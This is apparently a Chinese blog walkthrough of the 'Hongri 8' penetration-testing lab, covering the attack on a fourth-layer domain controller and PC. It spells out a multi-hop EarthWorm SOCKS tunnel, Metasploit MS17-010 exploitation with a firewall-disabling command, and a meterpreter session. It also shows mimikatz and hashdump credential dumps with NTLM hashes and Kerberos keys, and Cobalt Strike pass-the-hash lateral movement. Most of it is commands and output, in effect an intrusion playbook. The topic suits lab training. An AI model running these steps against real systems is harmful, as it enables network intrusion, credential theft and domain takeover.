目录
6、cs上线baecon【前提是DC有1块网卡:vmnet8】
本文详细讲解红日靶场8的多层内网渗透全流程。当前已成功控制第一层DMZ跳板机(192.168.59.143)、第二层内网主机(192.168.3.144)、第三层内网主机(172.16.10.133),目标是第四层内网的DC和PC。
🟢 已控制节点
-
Kali攻击机 (L0):攻击指挥中心,代理链起点,SOCKS5网关
-
DMZ跳板机 (L1):永恒之蓝法等渗透成功,连接外网与内网第一层,跨Vmnet8-Vmnet10边界
-
内网主机A (L2):永恒之蓝法等渗透成功,连接2个内网网段,跨Vmnet10-Vmnet11边界
-
内网主机B (L3):sqlmap注入等渗透成功,连接2个内网网段,跨Vmnet11-Vmnet12边界
🔴 目标节点
-
域控制器 (20.11.11.129)
-
高危风险:MS17-010永恒之蓝
-
开放端口:88(Kerberos), 135(MSRPC), 139(NetBIOS), 445(SMB)
-
系统:Windows Server 2012 R2 Datacenter
-
-
客户端PC (20.11.11.133)
-
开放服务:HTTP(7777/8888/8000)
-
系统:Windows桌面系统
-
工作组:WORKGROUP\DESKTOP-V2UNPOT
-
一、网络拓扑
1、拓扑表
这是一套典型的4层隔离渗透测试环境,采用逐级跳转的网段设计。外部攻击者从Kali攻击机(192.168.59.129)出发,需通过四层网络边界才能到达最终目标。第一层DMZ跳板机(192.168.59.143)作为初始突破口,具备双网卡连接内外网。攻破后,攻击者进入第二层内部网络(192.168.3.0/24),再通过内网第一层主机(192.168.3.144)跳转至第三层网络(172.16.10.0/24)。继续渗透内网第三层主机(172.16.10.133)后,最终可进入第四层核心网络(20.11.11.0/24),其中包含域控制器(20.11.11.129)和客户端PC(20.11.11.133)等关键目标。这种拓扑模拟了企业真实网络的分区防御架构,每层都需要独立的横向移动和权限提升技术,完整测试从外网到内网核心区域的纵深渗透能力。
| 层级 | 网络区域 | 主机角色 | IP地址/网卡 | 当前状态 |
|---|---|---|---|---|
| L0 | 外部网络 | Kali攻击机 | Vmnet8: 192.168.59.129 | 🟢 控制端 |
| L1 | DMZ区域 | 第一层跳板机 | Vmnet8: 192.168.59.143 Vmnet10: 192.168.3.128 | 🟢 已控制 |
| L2 | 内网一层 | 第二层转发机 | Vmnet10: 192.168.3.144 Vmnet11: 172.16.10.128 | 🟢 已控制 |
| L3 | 内网二层 | 第三层出口机 | Vmnet11: 172.16.10.133 Vmnet12: 20.11.11.130 | 🟢 已控制 |
| L4 | 核心网络 | 域控制器(DC) | Vmnet12: 20.11.11.129 | 🔴 最终目标 |
| L4 | 核心网络 | 客户端PC | Vmnet12: 20.11.11.133 | 🔴 横向目标 |
2、第四层DC与PC配置
(1)重置PC密码
这里要强调一下,原始的红日8靶场的第四层PC机由于配置ip地址时,其使用了静态的ip地址,同时指向的域服务器ip地址也是静态的,故而对域服务器DC修改PC的密码时,因为DC和PC无法通信,仍然会导致无法登录PC,故而需要使用PE工具对PC重置密码。在重置administrator密码后,进入PC。
如下所示,配置与DC同一网段的ip地址为自动获取,将DNS服务器改为DC的ip地址。
附上DC的默认IP配置,也正因如此需要将PC的dns服务器指向20.11.11.129.
(2)重置DC密码
DC开机后即提示重置密码,重置后进入系统。
选择computers可以查看同网段其他电脑的名称,此时即可发现同网段的PC设备,如下所示。
二、配置代理
1、总体设计
(1)总体配置
当前已控制第一层DMZ跳板机(192.168.59.143)、第二层内网主机A(192.168.3.144)和第三层内网主机B(172.16.10.133),目标为第四层核心网络的域控制器(20.11.11.129)和客户端PC(20.11.11.133)。为此需搭建三层EarthWorm代理链实现深度穿透:第一层在攻击机启动lcx_listen(12348→10001);第二层在DMZ跳板机部署lcx_slave连接攻击机10001并转发至内网主机A的10002端口;第三层在内网主机A启动lcx_listen(10002→10003);最终在第三层主机B运行rssocks反向SOCKS5代理,连接主机A的10003端口建立反向隧道,从而实现攻击机可以访问到20.11.11.0/24网络,实现对域控制器和客户端PC的直接访问。
|
攻击机(ip:192.168.59.129) ./ew_for_linux64 -s lcx_listen -l 12348 -e 10001 攻击机器(或者VPS),将123480端口收到代理请求转发给10001端口 第一层代理(ip1:192.168.59.143, ip2:192.168.3.128): ew_win32.exe -s lcx_slave -d 192.168.59.129 -e 10001 -f 192.168.3.144 -g 10002 连接攻击机器(或者VPS)的10001端口,另一端连接第二层的10002端口 第二层代理(ip1:192.168.3.144, ip2:172.16.10.128): ew_win32.exe -s lcx_listen -l 10002 -e 10003 在第二层主机上监听10002和10003端口,将10002端口代理请求转发给10003端口 第三层代理(ip1:172.16.10.133,ip2:20.11.11.130) ./ew_for_linux64 -s rssocks -d 172.16.10.128 -e 10003 在第三层主机上启动socks5 代理服务,并连接第二层主机的10003,将流量转发给他监听的10002端口 |
(2)拓扑角色
此时系统中的每个角色的端口配置如下表所示。
| 层级 | 网络区域 | 主机角色 | EW服务模式 | 端口配置 | 当前状态 |
|---|---|---|---|---|---|
| L0 | 外部网络 | Kali攻击机 | lcx_listen | 12348→10001 | 🟢 控制端 |
| L1 | DMZ区域 | 第一层跳板机 | lcx_slave | 连接10001→转发10002 | 🟢 已控制 |
| L2 | 内网一层 | 第二层转发机 | lcx_listen | 10002→10003 | 🟢 已控制 |
| L3 | 内网二层 | 第三层出口机 | rssocks | 反向连接10003 | 🟢 已控制 |
| L4 | 核心网络 | 域控制器(DC) | - | 🔴 最终目标 | |
| L4 | 核心网络 | 客户端PC | - | 🔴 横向目标 |
(3)端口数据流
每个端口的配置逻辑如下所示。
| 端口 | 方向 | 协议 | 功能 |
|---|---|---|---|
| 12348 | 入站 | SOCKS5 | 攻击机代理入口 |
| 10001 | 出站 | TCP | L0→L1中继 |
| 10002 | 监听 | TCP | L2接收端口 |
| 10003 | 出站 | TCP | L2→L3转发 |
对应的端口数据流如下所示
攻击机(L0) ──12348(SOCKS5入口)──→ lcx_listen ──10001──→
↓
DMZ跳板机(L1) ←─连接10001─ lcx_slave ──转发10002──→
↓
内网主机A(L2) ←─监听10002─ lcx_listen ──10003──→
↓
内网主机B(L3) ←─连接10003─ rssocks (SOCKS5出口)
↓
核心网络(L4) ←─代理访问─ 20.11.11.129/133(4)攻击流量路径
攻击工具 → proxychains(socks5:12348) →
L0(12348→10001) →
L1(连接10001→转发10002) →
L2(10002→10003) →
L3(rssocks反向连接) →
L4(20.11.11.129/133目标访问)2、代理详细配置
| 节点 | 执行命令 | 功能说明 |
|---|---|---|
| Kali攻击机 | ./ew_for_linux64 -s lcx_listen -l 12348 -e 10001 | 创建一级转发:12348(SOCKS5入口)→10001(中继出口) |
| DMZ跳板机 | ew_win32.exe -s lcx_slave -d 192.168.59.129 -e 10001 -f 192.168.3.144 -g 10002 | 二级中继:连接攻击机10001→转发到内网10002 |
| 二层内网主机A | ew_win32.exe -s lcx_listen -l 10002 -e 10003 | 三级转发:监听10002→转发到10003 |
| 三层内网主机B | ./ew_for_linux64 -s rssocks -d 172.16.10.128 -e 10003 | 四级反向代理:建立SOCKS5服务,反向连接10003 |
(1)攻击机
./ew_for_linux64 -s lcx_listen -l 1080 -e 12348
(2)一层跳板机
# 层级2:第一层代理 (192.168.59.143, 192.168.3.128)
ew_win32.exe -s lcx_slave -d 192.168.59.129 -e 10001 -f 192.168.3.144 -g 10002
(3)二层内网主机
# 层级3:第二层代理 (192.168.3.144)
ew_win32.exe -s lcx_listen -l 10002 -e 10003
(4)三层内网主机
# 层级4:第三层代理 (172.16.10.133)
./ew_for_linux64 -s rssocks -d 172.16.10.128 -l 10003
3、proxychain代理
0.0.0.0 12348
测试代理有效性,如下所示代理有效。
proxychains nmap -sn 20.11.11.0/24
三、第四层DC渗透
1、信息搜集
在第三层内网主机执行fscan,对DC(20.11.11.129)进行扫描,如下所示。
|
fscan_amd64 -h 20.11.11.129 start infoscan 20.11.11.129:135 open 20.11.11.129:139 open 20.11.11.129:445 open 20.11.11.129:88 open [*] alive ports len is: 4 start vulscan [+] MS17-010 20.11.11.129 (Windows Server 2012 R2 Datacenter 9600) [*] NetBios 20.11.11.129 [+] DC:DC.qiyuan-my.com Windows Server 2012 R2 Datacenter 9600 [*] NetInfo [*]20.11.11.129 [->]DC [->]20.11.11.129 [->]2002:140b:b81::140b:b81 已完成 4/4 [*] 扫描结束,耗时: 3.0646884s |
对域控制器20.11.11.129的专项扫描确认了其作为核心目标的关键脆弱性。开放端口揭示了完整的Windows域服务架构:445端口(SMB)存在MS17-010永恒之蓝高危风险,可直接获取SYSTEM权限;88端口(Kerberos认证服务)暴露了域身份验证入口,可能用于Kerberoasting或黄金票据攻击;135端口(MSRPC)支持远程过程调用,可用于服务枚举与凭证窃取;139端口(NetBIOS)则提供网络基本信息泄露。系统确认为Windows Server 2012 R2 Datacenter(版本9600),域名DC.qiyuan-my.com,具备完整的域控制器角色。攻击路径已明确:首选MS17-010直接获取系统控制权,或结合Kerberos服务进行凭证攻击。此域控的沦陷将意味着整个第四层网络乃至整个内网域的完全失守,可提取域内所有用户凭证并实施持久化控制。
2、MSF配置代理
在Metasploit中配置全局代理,使所有后续攻击流量通过EarthWorm建立的socks5代理链进行路由。setg表示全局设置(global),Proxies参数指定代理类型和地址,socks5:192.168.59.129:12348指向Kali本地的12348端口,即EW三层代理链的入口点。配置后,所有MSF模块(扫描、利用、载荷传输)的流量都将通过此代理链传输,依次经过DMZ跳板机、内网主机A和内网主机B的层层转发,最终从20.11.11.130主机发出,实现对核心网络域控制器(20.11.11.129)的透明化访问,解决了多层内网环境下的网络可达性问题。
msfconsole
setg Proxies socks5:192.168.59.129:12348
3、ms17-010渗透
search ms17-010
(1)永恒之蓝渗透失败
set rhost 20.11.11.129
set payload windows/meterpreter/bind_tcp
(2)关闭fw
use 2
set command netsh advfirewall set allprofiles state off
set rhosts 20.11.11.129
run
|
exploit(windows/smb/ms17_010_eternalblue) > use 2 msf6 auxiliary(admin/smb/ms17_010_command) > set command netsh advfirewall set allprofiles state off command => netsh advfirewall set allprofiles state off msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 20.11.11.129 rhosts => 20.11.11.129 msf6 auxiliary(admin/smb/ms17_010_command) > set lport 4567 msf6 auxiliary(admin/smb/ms17_010_command) > run |
(3)psexec渗透成功
set rhost 20.11.11.129
set payload windows/meterpreter/bind_tcp
set ExitOnSession false
特别强调容易exit,加上set ExitOnSession false命令
|
msf6 exploit(windows/smb/ms17_010_psexec) > run NOTE: Rex::Socket.gethostbyname is deprecated, use getaddress, resolve_nbo, or similar instead. It will be removed in the next Major version [*] 20.11.11.129:445 - Target OS: Windows Server 2012 R2 Datacenter 9600 [*] 20.11.11.129:445 - Built a write-what-where primitive... [+] 20.11.11.129:445 - Overwrite complete... SYSTEM session obtained! [*] 20.11.11.129:445 - Selecting PowerShell target [*] 20.11.11.129:445 - Executing the payload... [+] 20.11.11.129:445 - Service start timed out, OK if running a command or non-service executable... [*] Started bind TCP handler against 20.11.11.129:4567 NOTE: Rex::Socket.gethostbyname is deprecated, use getaddress, resolve_nbo, or similar instead. It will be removed in the next Major version NOTE: Rex::Socket.gethostbyname is deprecated, use getaddress, resolve_nbo, or similar instead. It will be removed in the next Major version [*] Sending stage (175174 bytes) to 20.11.11.129 [*] Meterpreter session 2 opened (192.168.59.129:33287 -> 192.168.59.129:12348 ) at 2025-11-21 23:27:18 -0500 |
(4)抓取密码
kiwi_cmd sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process
(5)进程注入
注入到x64进程中,如下所示。
(6)抓取密码
meterpreter > kiwi_cmd sekurlsa::logonpasswords
meterpreter > kiwi_cmd sekurlsa::logonpasswords
Authentication Id : 0 ; 65934 (00000000:0001018e)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/11/21 14:49:13
SID : S-1-5-90-1
msv :
[00000003] Primary
* Username : DC$
* Domain : QIYUAN-MY
* NTLM : 5de08ca9de4add04aeddc24616997e51
* SHA1 : 38dbeb05f99733e09a1865b6e2a28bdcd316b972
tspkg :
wdigest :
* Username : DC$
* Domain : QIYUAN-MY
* Password : (null)
kerberos :
* Username : DC$
* Domain : qiyuan-my.com
* Password : 06 9d 57 0d 9e 21 d1 ad 02 35 da be 99 49 31 14 a0 fc 1d fb 2f de ab c5 a1 dc 5c f3 26 74 73 c2 48 05 ff 9b 97 78 b0 2c 6e 54 82 49 34 65 c2 c5 09 91 2a 85 e1 e2 68 35 09 13 c2 32 4e 04 34 67 dd e4 5d 8e a6 c9 e9 87 56 6c 2f ad ac 27 3d fb 2c 26 a1 74 47 6b 10 d8 ca ef 5d 50 c1 7a b7 56 e3 71 a1 22 71 9e 79 8d 86 ad f6 c9 28 f0 05 25 66 b1 bd 0e 07 2a 59 8f 6e 32 fa ae 0b 39 ff 97 1e 86 bc 3e 2b 4c 24 39 7a 53 b0 83 45 b9 c6 14 b3 76 03 74 6b 07 fc 8d 21 fd 73 ec 78 35 56 75 87 cf fc 72 b7 06 1b 1c b0 1e d2 cf 91 35 6f 59 28 03 9b 6c 75 ec 48 7b ed 7e 36 8c 0f fe 3f 82 39 22 37 fe 94 82 a1 10 3a 8d d3 3d bb 82 50 f4 ad 34 74 cc bb f8 d8 f5 32 64 d9 45 8f 42 b5 73 43 5a 5e ec 91 c1 87 94 55 20 7a 64 c7 1b 00 47
ssp : KO
credman :
Authentication Id : 0 ; 65898 (00000000:0001016a)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/11/21 14:49:13
SID : S-1-5-90-1
msv :
[00000003] Primary
* Username : DC$
* Domain : QIYUAN-MY
* NTLM : 0df88a4d139d2ea3b03693e6b43512df
* SHA1 : c3fdbb8f3c33a334c0654825c236b96d4edea213
tspkg :
wdigest :
* Username : DC$
* Domain : QIYUAN-MY
* Password : (null)
kerberos :
* Username : DC$
* Domain : qiyuan-my.com
* Password : 75 52 9a 4d ed 79 00 64 3a d7 b4 0b 40 5e 06 4a 31 1d e4 b5 04 d9 85 f2 07 d4 52 8d 46 77 ba 18 aa f8 6e 7d 53 6f 4b 2b a3 dd 12 0a 18 a4 30 b1 5b 92 5a 7e 7e dd 3f 3f 73 01 be 51 4f b8 1d 0c f3 51 33 01 29 35 42 d8 4d 27 f5 f0 f1 9d 4e 4f 4f 55 33 e0 57 f7 d7 b8 24 e0 ec c9 d2 e2 31 47 27 ad bd 87 d5 e3 a3 73 53 de 9f 78 59 2e b4 33 94 b7 3e 5a 5d 9f 72 b1 60 e2 f7 cb 42 15 27 0b f6 8a a7 14 da 60 be 20 28 19 bd de 6e 21 52 92 98 47 76 99 f0 e8 e6 32 f3 0c 58 62 39 90 63 c5 57 da df b9 00 50 c2 a7 3b 1b ad 65 45 64 d0 c4 09 d5 66 71 f7 68 11 63 6e eb f9 c6 46 67 39 91 79 7e f5 c2 84 4b e6 2e 1c 10 56 77 0b a8 f8 97 54 bc 1d 6d 6e ee 73 9e 1e a3 a6 a0 5c 12 62 fd e3 23 43 a3 e3 6c f6 52 34 da 8a 7b dd 65 93 8b
ssp : KO
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DC$
Domain : QIYUAN-MY
Logon Server : (null)
Logon Time : 2025/11/21 14:49:13
SID : S-1-5-20
msv :
[00000003] Primary
* Username : DC$
* Domain : QIYUAN-MY
* NTLM : 0df88a4d139d2ea3b03693e6b43512df
* SHA1 : c3fdbb8f3c33a334c0654825c236b96d4edea213
tspkg :
wdigest :
* Username : DC$
* Domain : QIYUAN-MY
* Password : (null)
kerberos :
* Username : dc$
* Domain : QIYUAN-MY.COM
* Password : (null)
ssp : KO
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/11/21 14:49:14
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp : KO
credman :
Authentication Id : 0 ; 44019 (00000000:0000abf3)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/11/21 14:49:11
SID :
msv :
[00000003] Primary
* Username : DC$
* Domain : QIYUAN-MY
* NTLM : 0df88a4d139d2ea3b03693e6b43512df
* SHA1 : c3fdbb8f3c33a334c0654825c236b96d4edea213
tspkg :
wdigest :
kerberos :
ssp : KO
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DC$
Domain : QIYUAN-MY
Logon Server : (null)
Logon Time : 2025/11/21 14:49:11
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : DC$
* Domain : QIYUAN-MY
* Password : (null)
kerberos :
* Username : dc$
* Domain : QIYUAN-MY.COM
* Password : (null)
ssp : KO
credman :
域控制器凭证提取结果分析如下所示。
| 认证ID | 会话类型 | 用户名 | 域/工作组 | SID | NTLM Hash | SHA1 Hash | Kerberos凭据 | 安全风险等级 |
|---|---|---|---|---|---|---|---|---|
| 0;65934 | Interactive from 1 | DWM-1 | Window Manager | S-1-5-90-1 | 5de08ca9de4add04aeddc24616997e51 | 38dbeb05f99733e09a1865b6e2a28bdcd316b972 | 完整Kerberos密钥(160字节) | 🔴 极高 |
| 0;65898 | Interactive from 1 | DWM-1 | Window Manager | S-1-5-90-1 | 0df88a4d139d2ea3b03693e6b43512df | c3fdbb8f3c33a334c0654825c236b96d4edea213 | 完整Kerberos密钥(160字节) | 🔴 极高 |
| 0;996 | Service from 0 | DC$ | QIYUAN-MY | S-1-5-20 | 0df88a4d139d2ea3b03693e6b43512df | c3fdbb8f3c33a334c0654825c236b96d4edea213 | dc$@QIYUAN-MY.COM | 🔴 严重 |
| 0;997 | Service from 0 | LOCAL SERVICE | NT AUTHORITY | S-1-5-19 | 无 | 无 | 无 | 🟢 低 |
| 0;44019 | UndefinedLogonType | (null) | (null) | 空 | 0df88a4d139d2ea3b03693e6b43512df | c3fdbb8f3c33a334c0654825c236b96d4edea213 | 无 | 🟡 中 |
| 0;999 | UndefinedLogonType | DC$ | QIYUAN-MY | S-1-5-18 | 无 | 无 | dc$@QIYUAN-MY.COM | 🔴 严重 |
🔴 高危凭据(可直接用于域渗透)
| 凭据类型 | 具体值 | 可利用攻击 | 影响范围 |
|---|---|---|---|
| 计算机账户NTLM Hash | 0df88a4d139d2ea3b03693e6b43512df | Pass-the-Hash攻击 Silver Ticket伪造 | 整个QIYUAN-MY域 |
| 计算机账户NTLM Hash | 5de08ca9de4add04aeddc24616997e51 | Pass-the-Hash攻击 横向移动 | 域内所有主机 |
| Kerberos密钥 | 两个完整160字节密钥 | Golden Ticket攻击 Kerberos票据伪造 | 完全域控制权 |
| 计算机账户名 | DC$ (域控制器机器账户) | Silver Ticket攻击 资源访问伪造 | 域控制器级权限 |
🟡 中危发现
| 项目 | 说明 | 风险 |
|---|---|---|
| 多个相同Hash | 同一NTLM Hash在多个会话出现 | 可能为计算机账户标准密码 |
| 系统会话 | LOCAL SERVICE, SYSTEM会话 | 低权限但可能用于持久化 |
🟢 低风险项目
| 项目 | 说明 | 备注 |
|---|---|---|
| DWM-1账户 | Windows桌面窗口管理器 | 系统内置账户,无域权限 |
| 空凭据会话 | 认证ID 44019 | 可能为系统内部认证 |
(7)hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9ad0e16acc373a3a9269cf574f31209a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:181b2a32fa5012120d905588ca15ffa6:::
liukaifeng01:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
normaluser:1105:aad3b435b51404eeaad3b435b51404ee:6378c99402dd65bc21b8b79c610323e2:::
admin:1107:aad3b435b51404eeaad3b435b51404ee:077cccc23f8ab7031726a3b70c694a49:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:0df88a4d139d2ea3b03693e6b43512df:::
VAGRANT-2008R2-$:1106:aad3b435b51404eeaad3b435b51404ee:284fcf085375e62c76dce68ce3c61b39:::
WIN-P3Q2MQUOQC4$:1108:aad3b435b51404eeaad3b435b51404ee:639ba6fabe1515edc8a79cc4d45404a5:::
根据hashdump可获取到如下信息。
| 用户名 | RID | LM Hash | NTLM Hash | 密码状态 | 风险等级 |
|---|---|---|---|---|---|
| Administrator | 500 | aad3b435b51404eeaad3b435b51404ee | 9ad0e16acc373a3a9269cf574f31209a | 已设置密码 | 🔴 极高 |
| krbtgt | 502 | aad3b435b51404eeaad3b435b51404ee | 181b2a32fa5012120d905588ca15ffa6 | Kerberos服务账户 | 🔴 严重 |
| DC$ | 1002 | aad3b435b51404eeaad3b435b51404ee | 0df88a4d139d2ea3b03693e6b43512df | 计算机账户 | 🔴 严重 |
| admin | 1107 | aad3b435b51404eeaad3b435b51404ee | 077cccc23f8ab7031726a3b70c694a49 | 管理员账户 | 🔴 高 |
| normaluser | 1105 | aad3b435b51404eeaad3b435b51404ee | 6378c99402dd65bc21b8b79c610323e2 | 普通用户 | 🟡 中 |
| VAGRANT-2008R2-$ | 1106 | aad3b435b51404eeaad3b435b51404ee | 284fcf085375e62c76dce68ce3c61b39 | 计算机账户 | 🟡 中 |
| WIN-P3Q2MQUOQC4$ | 1108 | aad3b435b51404eeaad3b435b51404ee | 639ba6fabe1515edc8a79cc4d45404a5 | 计算机账户 | 🟡 中 |
| Guest | 501 | aad3b435b51404eeaad3b435b51404ee | 31d6cfe0d16ae931b73c59d7e0c089c0 | 已禁用 | 🟢 低 |
| liukaifeng01 | 1001 | aad3b435b51404eeaad3b435b51404ee | 31d6cfe0d16ae931b73c59d7e0c089c0 | 空密码 | 🟢 低 |
(8)creds_all
load kiwi和creds_all
(9)上传baecon
(10)执行baecon
6、cs上线baecon【前提是DC有1块网卡:vmnet8】
(1)baecon上线
(2)进程注入
右键-浏览探测-进程列表
(3)lsass.exe上线
(4)ms14-058提权
Lsass提权:谢公子的插件-权限提升-ms14-058
(5)arp端口扫描
发现windows8的ip地址,之前使用fscan和nmap都无法扫描到其ip地址,猜测因为fw导致无法扫到
对应windows8.x的vmnet12的网卡ip地址
除此之外,扫描还发现计算机的名称,不过依旧没有扫到20.11.11.133这台设备的任何端口信息。
20.11.11.130:22 (SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13)
20.11.11.130:21 (220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [20.11.11.130])
20.11.11.129:445 (platform: 500 version: 6.3 name: DC domain: QIYUAN-MY)
20.11.11.130:445 (platform: 500 version: 6.1 name: METASPLOITABLE3-UB1404 domain: WORKGROUP)
四、第四层PC渗透
1、关闭PC的防火墙
使用PE工具重置win8的密码后,登录将fw关闭。
2、DC域控CS
查看域控net view
3、psexec-psh
实际执行如下命令,具体如下所示。
|
[11/22 19:18:49] beacon> rev2self [11/22 19:18:49] [*] Tasked beacon to revert token [11/22 19:18:49] beacon> pth QIYUAN-MY\Administrator 29e5453fd2c79971dd3251cdad784400 [11/22 19:18:49] [+] host called home, sent: 31 bytes [11/22 19:18:49] [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:QIYUAN-MY /ntlm:29e5453fd2c79971dd3251cdad784400 /run:"%COMSPEC% /c echo 638b2599088 > \\.\pipe\e3f75e" command [11/22 19:18:49] beacon> jump psexec_psh WIN-P3Q2MQUOQC4 ljn [11/22 19:18:49] [*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_79) on WIN-P3Q2MQUOQC4 via Service Control Manager (PSH) [11/22 19:18:49] [+] host called home, sent: 305625 bytes [11/22 19:18:54] [+] Impersonated QIYUAN-MY\administrator [11/22 19:18:54] [+] received output: Started service b720942 on WIN-P3Q2MQUOQC4 [11/22 19:18:54] [+] received output: user : Administrator domain : QIYUAN-MY program : C:\Windows\system32\cmd.exe /c echo 638b2599088 > \\.\pipe\e3f75e impers. : no NTLM : 29e5453fd2c79971dd3251cdad784400 | PID 1924 | TID 864 | LSA Process is now R/W | LUID 0 ; 659396 (00000000:000a0fc4) \_ msv1_0 - data copy @ 000000C0B4C303A0 : OK ! \_ kerberos - data copy @ 000000C0B4C3F108 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000000C0B4C30128 (16) -> null [11/22 19:18:54] [+] host called home, sent: 214183 bytes [11/22 19:19:00] [+] established link to child beacon: 20.11.11.133 |
如下所示,成功渗透获取了PC机的CS权限。
4、CS上线PC
扫一扫
1897
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
